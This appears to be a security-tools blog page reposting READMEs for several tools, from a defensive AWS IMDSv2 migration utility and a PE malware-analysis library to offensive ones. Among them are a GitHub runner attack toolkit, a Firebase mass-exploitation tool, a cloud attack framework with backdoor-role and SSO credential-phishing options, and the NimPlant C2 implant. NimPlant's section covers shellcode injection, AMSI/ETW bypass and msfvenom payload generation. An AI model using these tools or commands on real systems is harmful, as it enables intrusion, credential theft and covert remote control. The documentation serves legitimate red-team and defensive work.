    IMDShift - Automates Migration Process Of Workloads To IMDSv2 To Avoid SSRF Attacks

    By: Zion3R β€” August 4th 2023 at 12:30


    AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration of all such workloads to IMDSv2, which implements enhanced security measures to protect against these attacks.
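    For EC2, the core of such a migration boils down to the standard boto3 call sketched below. This is illustrative only and not necessarily how IMDShift implements it.

    # Sketch of the EC2 part of a migration using the standard boto3 API; this is
    # illustrative and not necessarily how IMDShift implements it.
    import boto3

    ec2 = boto3.client("ec2", region_name="ap-south-1")

    for page in ec2.get_paginator("describe_instances").paginate():
        for reservation in page["Reservations"]:
            for instance in reservation["Instances"]:
                ec2.modify_instance_metadata_options(
                    InstanceId=instance["InstanceId"],
                    HttpTokens="required",           # enforce IMDSv2
                    HttpEndpoint="enabled",          # keep the metadata endpoint reachable
                    HttpPutResponseHopLimit=2,       # lets containers reach the endpoint
                )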


    Features

    • Detection of AWS workloads that rely on the metadata endpoint amongst various services which includes - EC2, ECS, EKS, Lightsail, AutoScaling Groups, Sagemaker Notebooks, Beanstalk (in progress)
    • Simple and intuitive command-line interface for easy usage
    • Automated migration of all workloads to IMDSv2
    • Standalone hop limit update for compatible resources
    • Standalone metadata endpoint enable operation for compatible resources
    • Detailed logging of migration process
    • Identify resources that are using IMDSv1, using the MetadataNoToken CloudWatch metric across specified regions
    • Built-in Service Control Policy (SCP) recommendations

    IMDShift vs. Metabadger

    Metabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.

    IMDShift makes several improvements on Metabadger's capabilities:

    • IMDShift allows migration of standalone services and not all EC2 instances, blindly. For example, the user can choose to only migrate EKS workloads, also some services such as Lightsail, do not fall under EC2 umbrella, IMDShift has the capability to migrate such resources as well.
    • IMDShift allows standalone enabling of metadata endpoint for resources it is currently disabled, without having to perform migration on the remaining resources
    • IMDShift allows standalone update response hop limit for resources where metadata endpoint is enabled, without having to perform migration on the remaining resources
    • IMDShift allows, not only the option to include specific regions, but also skip specified regions
    • IMDShift not only allows usage of AWS profiles, but also can assume roles, to work
    • IMDShift helps with post-migration activities, by suggesting various Service Control Policies (SCPs) to implement.

    Installation

    Production Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install .

    Development Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install -e .

    Usage

    Options:
    --services TEXT This flag specifies services scan for IMDSv1
    usage from [EC2, Sagemaker, ASG (Auto Scaling
    Groups), Lightsail, ECS, EKS, Beanstalk].
    Format: "--services EC2,Sagemaker,ASG"
    --include-regions TEXT This flag specifies regions explicitly to
    include scan for IMDSv1 usage. Format: "--
    include-regions ap-south-1,ap-southeast-1"
    --exclude-regions TEXT This flag specifies regions to exclude from the
    scan explicitly. Format: "--exclude-regions ap-
    south-1,ap-southeast-1"
    --migrate This boolean flag enables IMDShift to perform
    the migration, defaults to "False". Format: "--
    migrate"
    --update-hop-limit INTEGER This flag specifies if the hop limit should be
    updated and with what value. It is recommended
    to set the hop limit to "2" to enable containers
    to be able to work with the IMDS endpoint. If
    this flag is not passed, hop limit is not
    updated during migration. Format: "--update-hop-
    limit 3"
    --enable-imds This boolean flag enables IMDShift to enable the
    metadata endpoint for resources that have it
    disabled and then perform the migration,
    defaults to "False". Format: "--enable-imds"
    --profile TEXT This allows you to use any profile from your
    ~/.aws/credentials file. Format: "--profile
    prod-env"
    --role-arn TEXT This flag lets you assume a role via aws sts.
    Format: "--role-arn
    arn:aws:sts::111111111:role/John"
    --print-scps This boolean flag prints Service Control
    Policies (SCPs) that can be used to control IMDS
    usage, like deny access for credentials fetched
    from IMDSv2 or deny creation of resources with
    IMDSv1, defaults to "False". Format: "--print-
    scps"
    --check-imds-usage This boolean flag launches a scan to identify
    how many instances are using IMDSv1 in specified
    regions, during the last 30 days, by using the
    "MetadataNoToken" CloudWatch metric, defaults to
    "False". Format: "--check-imds-usage"
    --help Show this message and exit.
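
    A typical scan-and-migrate run combines the documented flags. For example, assuming the pip install exposes an imdshift console command (check the project README for the exact entry point):

    imdshift --services EC2,EKS --include-regions ap-south-1,ap-southeast-1 --update-hop-limit 2 --migrate

    This would scan EC2 and EKS workloads in the two listed regions, raise the hop limit to 2 so containerised workloads can still reach the endpoint, and migrate the affected resources to IMDSv2.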



    PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS

    By: Zion3R β€” August 3rd 2023 at 12:30


    PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.


    PrivKit detects the following misconfigurations:

    • Checks for Unquoted Service Paths
    • Checks for Autologon Registry Keys
    • Checks for Always Install Elevated Registry Keys
    • Checks for Modifiable Autoruns
    • Checks for Hijackable Paths
    • Enumerates Credentials From Credential Manager
    • Looks for current Token Privileges

    Usage

    [03/20 00:51:06] beacon> privcheck
    [03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
    [03/20 00:51:06] [*] Checking For Unquoted Service Paths..
    [03/20 00:51:06] [*] Checking For Autologon Registry Keys..
    [03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
    [03/20 00:51:06] [*] Checking For Modifiable Autoruns..
    [03/20 00:51:06] [*] Checking For Hijackable Paths..
    [03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
    [03/20 00:51:06] [*] Checking For Token Privileges..
    [03/20 00:51:06] [+] host called home, sent: 10485 bytes
    [03/20 00:51:06] [+] received output:
    Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe

    Simply load the .cna file and type "privcheck".
    If you want to compile it yourself, you can use:
    make all
    or
    x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o

    If you want to check for just one misconfiguration, you can run the corresponding object file with "inline-execute", for example:
    inline-execute /path/tokenprivileges.o

    Acknowledgement

    Mr.Un1K0d3r - Offensive Coding Portal
    https://mr.un1k0d3r.world/portal/

    Outflank - C2-Tool-Collection
    https://github.com/outflanknl/C2-Tool-Collection

    dtmsecurity - Beacon Object File (BOF) Creation Helper
    https://github.com/dtmsecurity/bof_helper

    Microsoft :)
    https://learn.microsoft.com/en-us/windows/win32/api/

    HsTechDocs by HelpSystems(Fortra)
    https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm




    Gato - GitHub Self-Hosted Runner Enumeration And Attack Tool

    By: Zion3R β€” June 25th 2023 at 12:30


    Gato, or GitHub Attack Toolkit, is an enumeration and attack tool that allows both blue teamers and offensive security practitioners to evaluate the blast radius of a compromised personal access token within a GitHub organization.

    The tool also allows searching for and thoroughly enumerating public repositories that utilize self-hosted runners. GitHub recommends that self-hosted runners only be utilized for private repositories; however, thousands of organizations still utilize them.


    Who is it for?

    • Security engineers who want to understand the level of access a compromised classic PAT could provide an attacker
    • Blue teams that want to build detections for self-hosted runner attacks
    • Red Teamers
    • Bug bounty hunters who want to try and prove RCE on organizations that are utilizing self-hosted runners

    Features

    • GitHub Classic PAT Privilege Enumeration
    • GitHub Code Search API-based enumeration
    • GitHub Action Run Log Parsing to identify Self-Hosted Runners
    • Bulk Repo Sparse Clone Features
    • GitHub Action Workflow Parsing
    • Automated Command Execution Fork PR Creation
    • Automated Command Execution Workflow Creation
    • SOCKS5 Proxy Support
    • HTTPS Proxy Support

    Getting Started

    Installation

    Gato supports OS X and Linux with at least Python 3.7.

    In order to install the tool, simply clone the repository and use pip install. We recommend performing this within a virtual environment.

    git clone https://github.com/praetorian-inc/gato
    cd gato
    python3 -m venv venv
    source venv/bin/activate
    pip install .

    Gato also requires that git version 2.27 or above is installed and on the system's PATH. In order to run the fork PR attack module, sed must also be installed and present on the system's path.

    Usage

    After installing the tool, it can be launched by running gato or praetorian-gato.

    We recommend viewing the parameters for the base tool using gato -h, and the parameters for each of the tool's modules by running the following:

    • gato search -h
    • gato enum -h
    • gato attack -h

    The tool requires a GitHub classic PAT in order to function. To create one, log in to GitHub, go to GitHub Developer Settings, select Generate New Token, and then Generate new token (classic).

    After creating this token, set the GH_TOKEN environment variable within your shell by running export GH_TOKEN=<YOUR_CREATED_TOKEN>. Alternatively, store the token within a secure password manager and enter it when the application prompts you.
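
    For example, after generating the token (the value below is a placeholder), the documented setup and a first look at the enumeration module's options can be chained directly in the shell:

    export GH_TOKEN=<YOUR_CREATED_TOKEN>
    gato enum -h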

    For troubleshooting and additional details, such as installing in developer mode or running unit tests, please see the wiki.

    Documentation

    Please see the wiki for detailed documentation, as well as OpSec considerations for the tool's various modules!

    Bugs

    If you believe you have identified a bug within the software, please open an issue containing the tool's output, along with the actions you were trying to conduct.

    If you are unsure if the behavior is a bug, use the discussions section instead!

    Contributing

    Contributions are welcome! Please review our design methodology and coding standards before working on a new feature!

    Additionally, if you are proposing significant changes to the tool, please open an issue to start a conversation about the motivation for the changes.




    FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable

    By: noreply@blogger.com (Unknown) β€” April 29th 2023 at 12:30


    FirebaseExploiter is a vulnerability discovery tool that finds Firebase databases which are open and exploitable. It is primarily built for mass hunting bug bounties and for penetration testing.

    Features

    • Mass vulnerability scanning from list of hosts
    • Custom JSON data in exploit.json to upload during exploit
    • Custom URI path for exploit

    Usage

    Running the tool with its help flag displays usage information for the CLI along with all the arguments it supports.

    Installation

    FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go to install it successfully. Run the following command to install the latest version:

    go install -v github.com/securebinary/firebaseExploiter@latest

    Running FirebaseExploiter

    • Scan a specific domain to check for an insecure Firebase DB.
    • Exploit a Firebase DB by writing your own JSON document into it.
    • Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs (a minimal example is shown after this list).
    • Check the exploited URL to verify the vulnerability.
    • Add a custom path for exploiting Firebase DBs.
    • Mass scan for insecure Firebase databases from a list of target hosts.
    • Exploit vulnerable Firebase DBs from the list of target hosts.
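
    The contents of exploit.json are arbitrary: any valid JSON document you want written into the vulnerable database will do. A minimal illustrative example (hypothetical keys and values):

    {
      "poc": "firebase-db-is-publicly-writable",
      "researcher": "you@example.com"
    }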

    License

    FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contributions are welcome.



    PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness

    By: noreply@blogger.com (Unknown) β€” April 26th 2023 at 12:30


    PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

    Features

    • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
    • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
    • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
    • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
    • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
    • Calculate Shannon Entropy and Chi Squared for files and sections
    • Calculate ImpHash and Rich and RichPV hash values for files and sections
    • Parse RichHeader and verify checksum
    • Calculate and verify Optional Header checksum
    • Scan for PEiD signatures, internal file type signatures or your own signature database
    • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
    • Extract Unicode and ASCII strings contained in the file
    • Extraction and conversion of .ICO files from icons in the resource section
    • Extraction of version information and manifest from the file
    • Reading .NET metadata and streams (Alpha)

    For more information, have a look at the PortEx Wiki and the Documentation.

    PortexAnalyzer CLI and GUI

    PortexAnalyzer CLI is a command line tool that runs the PortEx library under the hood. If you are looking for a readily compiled command-line PE scanner to analyse files with, download it here: PortexAnalyzer.jar

    The GUI version is available here: PortexAnalyzerGUI

    Using PortEx

    Including PortEx in a Maven Project

    You can include PortEx in your project by adding the following Maven dependency:

    <dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    </dependency>

    To use a local build, add the library as follows:

    <dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    <scope>system</scope>
    <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
    </dependency>

    Including PortEx in an SBT project

    Add the dependency as follows in your build.sbt:

    libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

    Building PortEx

    Requirements

    PortEx is built with sbt.

    Compile and Build With sbt

    To simply compile the project invoke:

    $ sbt compile

    To create a jar:

    $ sbt package

    To compile a fat jar that can be used as command line tool, type:

    $ sbt assembly

    Create Eclipse Project

    You can create an Eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

    addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

    Generate the project files for Eclipse:

    $ sbt eclipse

    Import the project to Eclipse via the Import Wizard.

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs




    ThunderCloud - Cloud Exploit Framework

    By: noreply@blogger.com (Unknown) β€” March 27th 2023 at 11:30


    Cloud Exploit Framework


    Usage

    python3 tc.py -h

    _______ _ _ _____ _ _
    |__ __| | | | / ____| | | |
    | | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
    | | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
    | | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
    \_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|


    usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
    [-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

    Attack modules of cloud AWS

    optional arguments:
    -h, --help show this help message and exit
    -ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
    to verify if cognito endpoint is vulnerable and to extract credentials
    -reg REGION, --region REGION
    AWS region of the resource
    -accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
    AWS account of the victim
    -aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
    AWS access keys of the victim account
    -aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
    AWS secret key of the victim account
    -bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
    Name of the backdoor role in victim role
    -sso SSO_URL, --sso_url SSO_URL
    AWS SSO URL to phish for AWS credentials
    -enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
    To enumerate and assume account roles in victim AWS roles
    -s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
    Execute upload attack on S3 bucket
    -conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
    Azure Shared Access key for reading servicebus/queues/blobs etc
    -blob BLOB, --blob BLOB
    Azure blob enumeration
    -shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
    Azure shared key

    Requirements

    * python 3
    * pip
    * git

    Installation

    - get the project: git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/
    - install virtualenv (https://virtualenv.pypa.io/en/latest/): pip install virtualenv
    - create a Python 3.6 local environment: virtualenv -p python3.6 venv
    - activate the virtual environment: source venv/bin/activate
    - install project dependencies: pip install -r requirements.txt
    - run the tool via: python tc.py --help

    Running ThunderCloud

    Examples

    python3 tc.py -sso <sso_url> --region <region>
    python3 tc.py -ce <cognito_endpoint> --region <region>
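
    The other modules follow the same pattern of combining the documented flags. For instance, a hypothetical role-enumeration run (placeholder values; the exact flag combination each module expects is best confirmed against the source) might look like:

    python3 tc.py -enum_roles <role_name_to_enumerate> -accid <victim_account_id> -reg <region>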



    PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library

    By: noreply@blogger.com (Unknown) β€” March 22nd 2023 at 11:30



    Graphical interface for PortEx, a Portable Executable and Malware Analysis Library

    Download

    Releases page

    Features

    • Header information from: MSDOS Header, Rich Header, COFF File Header, Optional Header, Section Table
    • PE Structures: Import Section, Resource Section, Export Section, Debug Section
    • Scanning for file format anomalies
    • Visualize file structure, local entropies and byteplot, and save it as PNG
    • Calculate Shannon Entropy, Imphash, MD5, SHA256, Rich and RichPV hash
    • Overlay and overlay signature scanning
    • Version information and manifest
    • Icon extraction and saving as PNG
    • Customized signature scanning via Yara. Internal signature scans using PEiD signatures and an internal filetype scanner.

    Supported OS and JRE

    I test this program on Linux and Windows, but it should work on any OS with JRE version 9 or higher.

    Future

    I will be including more and more features that PortEx already provides.

    These features include among others:

    • customized visualization
    • extraction and conversion of icons to .ICO files
    • dumping of sections, overlay, resources
    • export reports to txt, json, csv

    Some of these features are already provided by PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs

    License

    License




    NimPlant - A Light-Weight First-Stage C2 Implant Written In Nim

    By: noreply@blogger.com (Unknown) β€” March 20th 2023 at 11:30


    By Cas van Cooten (@chvancooten), with special thanks to some awesome folks:

    • Fabian Mosch (@S3cur3Th1sSh1t) for sharing dynamic invocation implementation in Nim and the Ekko sleep mask function
    • snovvcrash (@snovvcrash) for adding the initial version of execute-assembly & self-deleting implant option
    • Furkan GΓΆksel (@frkngksl) for his work on NiCOFF and Guillaume CaillΓ© (@OffenseTeacher) for the initial implementation of inline-execute
    • Kadir Yamamoto (@yamakadi) for the design work, initial Vue.JS front-end and rusty nimplant, part of an older branch (unmaintained)
    • Mauricio Velazco (@mvelazco), Dylan Makowski (@AnubisOnSec), Andy Palmer (@pivotal8ytes), Medicus Riddick (@retsdem22), Spencer Davis (@nixbyte), and Florian Roth (@cyb3rops), for their efforts in testing the pre-release and contributing detections

    Feature Overview

    • Lightweight and configurable implant written in the Nim programming language
    • Pretty web GUI that will make you look cool during all your ops
    • Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts
    • Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables
    • Wide selection of commands focused on early-stage operations including local enumeration, file or registry management, and web interactions
    • Easy deployment of more advanced functionality or payloads via inline-execute, shinject (using dynamic invocation), or in-thread execute-assembly
    • Support for operations on any platform; the implant currently targets x64 Windows only
    • Comprehensive logging of all interactions and file operations
    • Much, much more, just see below :)

    Instructions

    Installation

    • Install Nim and Python3 on your OS of choice (installation via choosenim is recommended, as apt doesn't always have the latest version).
    • Install required packages using the Nimble package manager (cd client; nimble install -d).
    • Install requirements.txt from the server folder (pip3 install -r server/requirements.txt).
    • If you're on Linux or MacOS, install the mingw toolchain for your platform (brew install mingw-w64 or apt install mingw-w64).

    Getting Started

    Configuration

    Before using NimPlant, create the configuration file config.toml. It is recommended to copy config.toml.example and work from there.

    An overview of settings is provided below.

    • server ip: The IP that the C2 web server (including API) will listen on. Recommended to use 127.0.0.1; only use 0.0.0.0 when you have set up proper firewall or routing rules to protect the C2.
    • server port: The port that the C2 web server (including API) will listen on.
    • listener type: The listener type, either HTTP or HTTPS. HTTPS options are configured below.
    • listener sslCertPath: The local path to a HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when listener type is 'HTTP'.
    • listener sslKeyPath: The local path to the corresponding HTTPS certificate private key file. The password will be prompted for when running the NimPlant server, if set. Ignored when listener type is 'HTTP'.
    • listener hostname: The listener hostname. If not empty (""), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port.
    • listener ip: The listener IP. Required even if 'hostname' is set, as it is used by the server to register on this IP.
    • listener port: The listener port. Required even if 'hostname' is set, as it is used by the server to register on this port.
    • listener registerPath: The URI path that new NimPlants will register with.
    • listener taskPath: The URI path that NimPlants will get tasks from.
    • listener resultPath: The URI path that NimPlants will submit results to.
    • nimplant riskyMode: Compile NimPlant with support for risky commands. Operator discretion advised. Disabling will remove support for execute-assembly, powershell, shell and shinject.
    • nimplant sleepMask: Whether or not to use the Ekko sleep mask instead of regular sleep calls for Nimplants. Only works with regular executables for now!
    • nimplant sleepTime: The default sleep time in seconds for new NimPlants.
    • nimplant sleepJitter: The default jitter in percent for new NimPlants.
    • nimplant killDate: The kill date for Nimplants (format: yyyy-MM-dd). Nimplants will exit if this date has passed.
    • nimplant userAgent: The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent.
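
    As a rough sketch of how these settings could map onto config.toml (the layout and example values below are assumptions for illustration; copy config.toml.example from the repository for the authoritative structure):

    # Illustrative sketch only; all values are placeholders
    [server]
    ip = "127.0.0.1"
    port = 31337

    [listener]
    type = "HTTPS"
    sslCertPath = "/path/to/cert.pem"
    sslKeyPath = "/path/to/key.pem"
    hostname = ""
    ip = "0.0.0.0"
    port = 443
    registerPath = "/register"
    taskPath = "/task"
    resultPath = "/result"

    [nimplant]
    riskyMode = false
    sleepMask = false
    sleepTime = 60
    sleepJitter = 10
    killDate = "2030-01-01"
    userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"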

    Compilation

    Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe, .dll, and .bin binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python NimPlant.py compile followed by your preferred binaries (exe, exe-selfdelete, dll, raw, or all) and, optionally, the implant type (nim, or nim-debug). Files will be written to client/bin/.

    You may pass the rotatekey argument to generate and use a new XOR key during compilation.

    Notes:

    • NimPlant only supports x64 at this time!
    • The entrypoint for DLL files is Update, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update to trigger, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim)
    PS C:\NimPlant> python .\NimPlant.py compile all

    * *(# #
    ** **(## ##
    ######## ( ********
    ####(###########************,****
    # ######## ******** *
    .### ***
    .######## ********
    #### ### *** ****
    ######### ### *** *********
    ####### #### ## ** **** *******
    ##### ## * ** *****
    ###### #### ##*** **** .******
    ############### ***************
    ########## **********
    #########**********
    #######********
    _ _ _ ____ _ _
    | \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
    | \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
    | |\ | | | | | | | __/| | (_| | | | | |_
    |_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

    A light-weight stage 1 implant and C2 based on Nim and Python
    By Cas van Cooten (@chvancooten)

    Compiling .exe for NimPlant
    Compiling self-deleting .exe for NimPlant
    Compiling .dll for NimPlant
    Compiling .bin for NimPlant

    Done compiling! You can find compiled binaries in 'client/bin/'.

    Compilation with Docker

    The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.

    To use it, install Docker for your OS and start the compilation in a container as follows.

    docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPlant.py compile all

    Usage

    Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml file. To launch a server, simply run python NimPlant.py server (with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337 (by default).

    Notes:

    • If you are running your NimPlant server externally from the machine where binaries are compiled, make sure that both config.toml and .xorkey match. If not, NimPlant will not be able to connect.
    • The web frontend and API do not support authentication, so do NOT expose the frontend port to any untrusted networks without a secured reverse proxy!
    • If NimPlant cannot connect to a server or loses connection, it will retry 5 times with an exponential backoff time before attempting re-registration. If it fails to register 5 more times (same backoff logic), it will kill itself. The backoff triples the sleep time on each failed attempt. For example, if the sleep time is 10 seconds, it will wait 10, then 30 (3^1 * 10), then 90 (3^2 * 10), then 270 (3^3 * 10), then 810 seconds before giving up (these parameters are hardcoded but can be changed in client/NimPlant.nim).
    • Logs are stored in the server/logs directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads and server/downloads directories respectively.
    • Nimplant and server details are stored in an SQLite database at server/nimplant.db. This data is also used to recover Nimplants after a server restart.
    • Logs, uploaded/downloaded files, and the database can be cleaned up by running NimPlant.py with the cleanup flag. Caution: This will purge everything, so make sure to back up what you need first!
    PS C:\NimPlant> python .\NimPlant.py server     

    * *(# #
    ** **(## ##
    ######## ( ********
    ####(###########************,****
    # ######## ******** *
    .### ***
    .######## ********
    #### ### *** ****
    ######### ### *** *********
    ####### #### ## ** **** *******
    ##### ## * ** *****
    ###### #### ##*** **** .******
    ############### ***************
    ########## **********
    #########**********
    #######********
    _ _ _ ____ _ _
    | \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
    | \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
    | |\ | | | | | | | __/| | (_| | | | | |_
    |_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

    A light-weight stage 1 implant and C2 written in Nim and Python
    By Cas van Cooten (@chvancooten)

    [06/02/2023 10:47:23] Started management server on http://127.0.0.1:31337.
    [06/02/2023 10:47:23] Started NimPlant listener on https://0.0.0.0:443. CTRL-C to cancel waiting for NimPlants.

    This will start both the C2 API and management web server (in the example above at http://127.0.0.1:31337) and the NimPlant listener (in the example above at https://0.0.0.0:443). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.

    Available commands are as follows. You can get detailed help for any command by typing help [command]. Certain commands denoted with (GUI) can be configured graphically when using the web interface; this is done by calling the command without any arguments.

    Command arguments shown as [required] <optional>.
    Commands with (GUI) can be run without parameters via the web UI.

    cancel Cancel all pending tasks.
    cat [filename] Print a file's contents to the screen.
    cd [directory] Change the working directory.
    clear Clear the screen.
    cp [source] [destination] Copy a file or directory.
    curl [url] Get a webpage remotely and return the results.
    download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
    env Get environment variables.
    execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
    exit Exit the server, killing all NimPlants.
    getAv List Antivirus / EDR products on target using WMI.
    getDom Get the domain the target is joined to.
    getLocalAdm List local administrators on the target using WMI.
    getpid Show process ID of the currently selected NimPlant.
    getprocname Show process name of the currently selected NimPlant.
    help <command> Show this help menu or command-specific help.
    hostname Show hostname of the currently selected NimPlant.
    inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
    ipconfig List IP address information of the currently selected NimPlant.
    kill Kill the currently selected NimPlant.
    list Show list of active NimPlants.
    listall Show list of all NimPlants.
    ls <path> List files and folders in a certain directory. Lists current directory by default.
    mkdir [directory] Create a directory (and its parent directories if required).
    mv [source] [destination] Move a file or directory.
    nimplant Show info about the currently selected NimPlant.
    osbuild Show operating system build information for the currently selected NimPlant.
    powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
    ps List running processes on the target. Indicates current process.
    pwd Get the current working directory.
    reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
    rm [file] Remove a file or directory.
    run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
    screenshot Take a screenshot of the user's screen.
    select [id] Select another NimPlant.
    shell [command] Execute a shell command.
    shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
    sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
    upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
    wget [url] <remotefilepath> Download a file to disk remotely.
    whoami Get the user ID that NimPlant is running as.

    Using Beacon Object Files (BOFs)

    NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!

    NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a BOF requires a locally compiled BOF object file (usually called something like bofname.x64.o), an entrypoint (commonly go), and a list of arguments with their respective argument types. Arguments are passed as space-separated arg argtype pairs.

    Arguments are given in accordance with the "Zzsib" format, so each can be either a string (alias: z), wstring (or Z), integer (aliases: int or i), short (s), or binary (bin or b). Binary arguments can be a raw binary string or base64-encoded; the latter is recommended to avoid bad characters.

    Some usage examples (using the magnificent TrustedSec BOFs [1, 2]) are given below. Note that inline-execute (without arguments) can be used to configure the command graphically in the GUI.

    # Run a bof without arguments
    inline-execute ipconfig.x64.o go

    # Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional
    inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z

    # Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes
    # Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64
